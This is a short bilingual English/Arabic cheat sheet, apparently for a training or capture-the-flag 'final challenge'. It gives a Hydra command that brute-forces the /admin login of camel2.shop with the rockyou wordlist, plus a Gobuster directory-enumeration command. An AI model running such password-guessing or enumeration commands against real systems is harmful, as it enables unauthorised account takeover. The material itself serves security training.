Final Challenge Cheat Sheet

ورقة المساعدة للتحدي النهائي

Note: Type commands exactly as shown (spaces, slashes, case). They are case-sensitive.

🔐 Hydra

Used to brute-force login pages by guessing passwords.

يُستخدم لتخمين كلمة المرور واختراق صفحات تسجيل الدخول.

You will need the admin’s username. Think carefully — it’s something you’ve seen before.

ستحتاج إلى اسم المستخدم الخاص بالمسؤول. فكّر جيدًا – قد رأيته سابقًا.

hydra -l username -P /usr/share/wordlists/rockyou.txt camel2.shop \
http-post-form "/admin:username=^USER^&password=^PASS^:F=Incorrect username or password" -V -f

🔍 Gobuster

Find hidden pages and directories.

يُستخدم لاكتشاف الصفحات والمجلدات المخفية.

gobuster dir -u camel2.shop -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt